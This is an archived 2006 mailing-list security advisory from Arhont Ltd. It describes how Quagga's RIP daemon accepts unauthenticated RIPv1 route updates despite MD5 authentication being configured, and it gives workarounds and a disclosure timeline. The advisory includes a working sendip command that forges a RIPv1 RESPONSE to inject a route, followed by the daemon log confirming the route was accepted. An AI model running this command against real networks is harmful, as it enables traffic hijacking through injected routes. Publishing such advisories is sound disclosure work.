lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44580900.8090700@arhont.com>
Date: Wed, 03 May 2006 02:36:00 +0100
From: "Konstantin V. Gavrilenko" <mlists@...ont.com>
To: bugtraq@...urityfocus.com,  full-disclosure@...ts.grok.org.uk
Cc: maintainers@...gga.net, paul@...bi.ie
Subject: Quagga RIPD unauthenticated route injection


Arhont Ltd - Information Security

Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
Arhont ref:	arh200604-2
Advisory:	Quagga RIPD unauthenticated route injection
Class:		design bug?
Version:	Tested on Quagga suite v0.98.5 v0.99.3 (Gentoo, 2.6.15)
Model Specific:	Other versions might have the same bug


DETAILS
It is possible to inject a custom malicious route into the quagga RIP
daemon using the RIPv1 RESPONSE packet even if the quagga has been
configured to use MD5 authentication.

The prerequisite to the attack is the absence of the specific version of
the protocol in the router rip configuration. This way, quagga accepts
authenticated RIPv2 and also RIPv1 packets, that do not have
authentication mechanism at all.

configuration of the ripd
key chain dmz
 key 1
  key-string secret
!
interface eth0
 ip rip authentication mode md5 auth-length old-ripd
 ip rip authentication key-chain dmz
!
router rip
 redistribute static
 network eth0

arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p
rip -rv 1 -rc 2  -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100

RIPD LOG
2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
2006/05/02 16:06:45 RIP: Resultant route 192.168.36.0
2006/05/02 16:06:45 RIP: Resultant mask 255.255.255.0
2006/05/02 16:06:45 RIP: triggered update!


RISK FACTOR: Medium


WORKAROUNDS: Implement the patch for the ripd or firewall the access to
the ripd daemon on the need to access basis.


COMMUNICATION HISTORY:
Issue discovered:	  10/04/2006
quagga notified:	  24/04/2006
Public disclosure:	  03/05/2006

ADDITIONAL INFORMATION:
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@...ont.com


-- 
Respectfully,
Konstantin V. Gavrilenko

Managing Director
Arhont Ltd - Information Security

web:    http://www.arhont.com
	http://www.wi-foo.com
e-mail: k.gavrilenko@...ont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ